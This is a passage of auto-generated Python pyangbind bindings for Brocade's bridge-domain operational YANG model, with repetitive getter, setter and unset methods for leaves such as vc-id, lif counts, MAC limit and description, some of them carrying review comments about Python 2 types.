'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="vc-id", rest_name="vc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)""",
})
self.__vc_id = t
if hasattr(self, '_set'):
self._set()
def _unset_vc_id(self):
self.__vc_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="vc-id", rest_name="vc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
def _get_active_ac_lif_count(self):
"""
Getter method for active_ac_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/active_ac_lif_count (uint16)
YANG Description: active ac lif count
"""
return self.__active_ac_lif_count
def _set_active_ac_lif_count(self, v, load=False):
"""
Setter method for active_ac_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/active_ac_lif_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_active_ac_lif_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_active_ac_lif_count() directly.
YANG Description: active ac lif count
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-ac-lif-count", rest_name="active-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """active_ac_lif_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-ac-lif-count", rest_name="active-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
})
self.__active_ac_lif_count = t
if hasattr(self, '_set'):
self._set()
def _unset_active_ac_lif_count(self):
self.__active_ac_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-ac-lif-count", rest_name="active-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_config_ac_lif_count(self):
"""
Getter method for config_ac_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/config_ac_lif_count (uint16)
YANG Description: config ac lif count
"""
return self.__config_ac_lif_count
def _set_config_ac_lif_count(self, v, load=False):
"""
Setter method for config_ac_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/config_ac_lif_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_config_ac_lif_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config_ac_lif_count() directly.
YANG Description: config ac lif count
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-ac-lif-count", rest_name="config-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config_ac_lif_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-ac-lif-count", rest_name="config-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
})
self.__config_ac_lif_count = t
if hasattr(self, '_set'):
self._set()
def _unset_config_ac_lif_count(self):
self.__config_ac_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-ac-lif-count", rest_name="config-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_active_vfi_lif_count(self):
"""
Getter method for active_vfi_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/active_vfi_lif_count (uint16)
YANG Description: active vfi lif count
"""
return self.__active_vfi_lif_count
def _set_active_vfi_lif_count(self, v, load=False):
"""
Setter method for active_vfi_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/active_vfi_lif_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_active_vfi_lif_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_active_vfi_lif_count() directly.
YANG Description: active vfi lif count
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-vfi-lif-count", rest_name="active-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """active_vfi_lif_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-vfi-lif-count", rest_name="active-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
})
self.__active_vfi_lif_count = t
if hasattr(self, '_set'):
self._set()
def _unset_active_vfi_lif_count(self):
self.__active_vfi_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-vfi-lif-count", rest_name="active-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_config_vfi_lif_count(self):
"""
Getter method for config_vfi_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/config_vfi_lif_count (uint16)
YANG Description: config vfi lif count
"""
return self.__config_vfi_lif_count
def _set_config_vfi_lif_count(self, v, load=False):
"""
Setter method for config_vfi_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/config_vfi_lif_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_config_vfi_lif_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config_vfi_lif_count() directly.
YANG Description: config vfi lif count
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-vfi-lif-count", rest_name="config-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config_vfi_lif_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-vfi-lif-count", rest_name="config-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
})
self.__config_vfi_lif_count = t
if hasattr(self, '_set'):
self._set()
def _unset_config_vfi_lif_count(self):
self.__config_vfi_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-vfi-lif-count", rest_name="config-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_local_switching(self):
"""
Getter method for local_switching, mapped from YANG variable /bridge_domain_state/bridge_domain_list/local_switching (boolean)
YANG Description: local switching
"""
return self.__local_switching
def _set_local_switching(self, v, load=False):
"""
Setter method for local_switching, mapped from YANG variable /bridge_domain_state/bridge_domain_list/local_switching (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_switching is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_switching() directly.
YANG Description: local switching
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="local-switching", rest_name="local-switching", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """local_switching must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-switching", rest_name="local-switching", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)""",
})
self.__local_switching = t
if hasattr(self, '_set'):
self._set()
def _unset_local_switching(self):
self.__local_switching = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-switching", rest_name="local-switching", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
def _get_block_bpdu(self):
    """
    Getter method for block_bpdu, mapped from YANG variable /bridge_domain_state/bridge_domain_list/block_bpdu (boolean)

    YANG Description: block bpdu
    """
    return self.__block_bpdu


def _set_block_bpdu(self, v, load=False):
    """
    Setter method for block_bpdu, mapped from YANG variable /bridge_domain_state/bridge_domain_list/block_bpdu (boolean)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_block_bpdu is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_block_bpdu() directly.

    YANG Description: block bpdu
    """
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="block-bpdu", rest_name="block-bpdu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """block_bpdu must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="block-bpdu", rest_name="block-bpdu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)""",
        })
    self.__block_bpdu = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_block_bpdu(self):
    # Reset the leaf to a fresh, empty instance of its generated type.
    self.__block_bpdu = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="block-bpdu", rest_name="block-bpdu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
def _get_bd_type(self):
    """
    Getter method for bd_type, mapped from YANG variable /bridge_domain_state/bridge_domain_list/bd_type (uint16)

    YANG Description: bd type
    """
    return self.__bd_type


def _set_bd_type(self, v, load=False):
    """
    Setter method for bd_type, mapped from YANG variable /bridge_domain_state/bridge_domain_list/bd_type (uint16)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_bd_type is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_bd_type() directly.

    YANG Description: bd type
    """
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # uint16 leaf: RestrictedClassType enforces the 0..65535 range.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="bd-type", rest_name="bd-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """bd_type must be of a type compatible with uint16""",
            'defined-type': "uint16",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="bd-type", rest_name="bd-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
        })
    self.__bd_type = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_bd_type(self):
    # Reset the leaf to a fresh, empty instance of its generated type.
    self.__bd_type = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="bd-type", rest_name="bd-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_ve_ifindex(self):
    """
    Getter method for ve_ifindex, mapped from YANG variable /bridge_domain_state/bridge_domain_list/ve_ifindex (uint32)

    YANG Description: ve_ifindex
    """
    return self.__ve_ifindex


def _set_ve_ifindex(self, v, load=False):
    """
    Setter method for ve_ifindex, mapped from YANG variable /bridge_domain_state/bridge_domain_list/ve_ifindex (uint32)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ve_ifindex is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ve_ifindex() directly.

    YANG Description: ve_ifindex
    """
    # NOTE(review): `long` makes this Python-2-only generated code.
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # uint32 leaf: RestrictedClassType enforces the 0..4294967295 range.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-ifindex", rest_name="ve-ifindex", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """ve_ifindex must be of a type compatible with uint32""",
            'defined-type': "uint32",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-ifindex", rest_name="ve-ifindex", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)""",
        })
    self.__ve_ifindex = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_ve_ifindex(self):
    # Reset the leaf to a fresh, empty instance of its generated type.
    self.__ve_ifindex = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-ifindex", rest_name="ve-ifindex", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
def _get_ve_id(self):
    """
    Getter method for ve_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/ve_id (uint32)

    YANG Description: ve_id
    """
    return self.__ve_id


def _set_ve_id(self, v, load=False):
    """
    Setter method for ve_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/ve_id (uint32)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ve_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ve_id() directly.

    YANG Description: ve_id
    """
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # uint32 leaf: RestrictedClassType enforces the 0..4294967295 range.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-id", rest_name="ve-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """ve_id must be of a type compatible with uint32""",
            'defined-type': "uint32",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-id", rest_name="ve-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)""",
        })
    self.__ve_id = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_ve_id(self):
    # Reset the leaf to a fresh, empty instance of its generated type.
    self.__ve_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-id", rest_name="ve-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
def _get_pw_profile(self):
    """
    Getter method for pw_profile, mapped from YANG variable /bridge_domain_state/bridge_domain_list/pw_profile (string)

    YANG Description: pw_profile
    """
    return self.__pw_profile


def _set_pw_profile(self, v, load=False):
    """
    Setter method for pw_profile, mapped from YANG variable /bridge_domain_state/bridge_domain_list/pw_profile (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_pw_profile is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_pw_profile() directly.

    YANG Description: pw_profile
    """
    # NOTE(review): `unicode` makes this Python-2-only generated code.
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="pw-profile", rest_name="pw-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """pw_profile must be of a type compatible with string""",
            'defined-type': "string",
            'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="pw-profile", rest_name="pw-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)""",
        })
    self.__pw_profile = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_pw_profile(self):
    # Reset the leaf to a fresh, empty instance of its generated type.
    self.__pw_profile = YANGDynClass(base=unicode, is_leaf=True, yang_name="pw-profile", rest_name="pw-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
def _get_mac_limit(self):
    """
    Getter method for mac_limit, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mac_limit (uint16)

    YANG Description: mac_limit
    """
    return self.__mac_limit


def _set_mac_limit(self, v, load=False):
    """
    Setter method for mac_limit, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mac_limit (uint16)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mac_limit is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mac_limit() directly.

    YANG Description: mac_limit
    """
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # uint16 leaf: RestrictedClassType enforces the 0..65535 range.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="mac-limit", rest_name="mac-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """mac_limit must be of a type compatible with uint16""",
            'defined-type': "uint16",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="mac-limit", rest_name="mac-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)""",
        })
    self.__mac_limit = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_mac_limit(self):
    # Reset the leaf to a fresh, empty instance of its generated type.
    self.__mac_limit = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="mac-limit", rest_name="mac-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
def _get_statistics(self):
    """
    Getter method for statistics, mapped from YANG variable /bridge_domain_state/bridge_domain_list/statistics (boolean)

    YANG Description: statistics
    """
    return self.__statistics


def _set_statistics(self, v, load=False):
    """
    Setter method for statistics, mapped from YANG variable /bridge_domain_state/bridge_domain_list/statistics (boolean)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_statistics is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_statistics() directly.

    YANG Description: statistics
    """
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="statistics", rest_name="statistics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """statistics must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="statistics", rest_name="statistics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)""",
        })
    self.__statistics = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_statistics(self):
    # Reset the leaf to a fresh, empty instance of its generated type.
    self.__statistics = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="statistics", rest_name="statistics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
def _get_mac_addr_withdrawal(self):
    """
    Getter method for mac_addr_withdrawal, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mac_addr_withdrawal (boolean)

    YANG Description: mac address withdrawal
    """
    return self.__mac_addr_withdrawal


def _set_mac_addr_withdrawal(self, v, load=False):
    """
    Setter method for mac_addr_withdrawal, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mac_addr_withdrawal (boolean)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mac_addr_withdrawal is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mac_addr_withdrawal() directly.

    YANG Description: mac address withdrawal
    """
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="mac-addr-withdrawal", rest_name="mac-addr-withdrawal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """mac_addr_withdrawal must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mac-addr-withdrawal", rest_name="mac-addr-withdrawal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)""",
        })
    self.__mac_addr_withdrawal = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_mac_addr_withdrawal(self):
    # Reset the leaf to a fresh, empty instance of its generated type.
    self.__mac_addr_withdrawal = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mac-addr-withdrawal", rest_name="mac-addr-withdrawal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
def _get_mct_enabled(self):
    """
    Getter method for mct_enabled, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mct_enabled (boolean)

    YANG Description: mct enabled
    """
    return self.__mct_enabled


def _set_mct_enabled(self, v, load=False):
    """
    Setter method for mct_enabled, mapped from YANG variable /bridge_domain_state/bridge_domain_list/mct_enabled (boolean)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_mct_enabled is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_mct_enabled() directly.

    YANG Description: mct enabled
    """
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="mct-enabled", rest_name="mct-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """mct_enabled must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mct-enabled", rest_name="mct-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)""",
        })
    self.__mct_enabled = t
    # Fire the parent-notification hook when present.
    if hasattr(self, '_set'):
        self._set()


def _unset_mct_enabled(self):
    # Reset the leaf to a fresh, empty instance of its generated type.
    self.__mct_enabled = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mct-enabled", rest_name="mct-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
def _get_description(self):
    """
    Getter method for description, mapped from YANG variable /bridge_domain_state/bridge_domain_list/description (string)

    YANG Description: bridge domain specific description
    """
    return self.__description


def _set_description(self, v, load=False):
    """
    Setter method for description, mapped from YANG variable /bridge_domain_state/bridge_domain_list/description (string)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_description is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_description() directly.

    YANG Description: bridge domain specific description
    """
    # Unwrap pyangbind typed wrappers to their native value before re-validation.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """description must be of a type compatible with string""",
            'defined-type': "string",
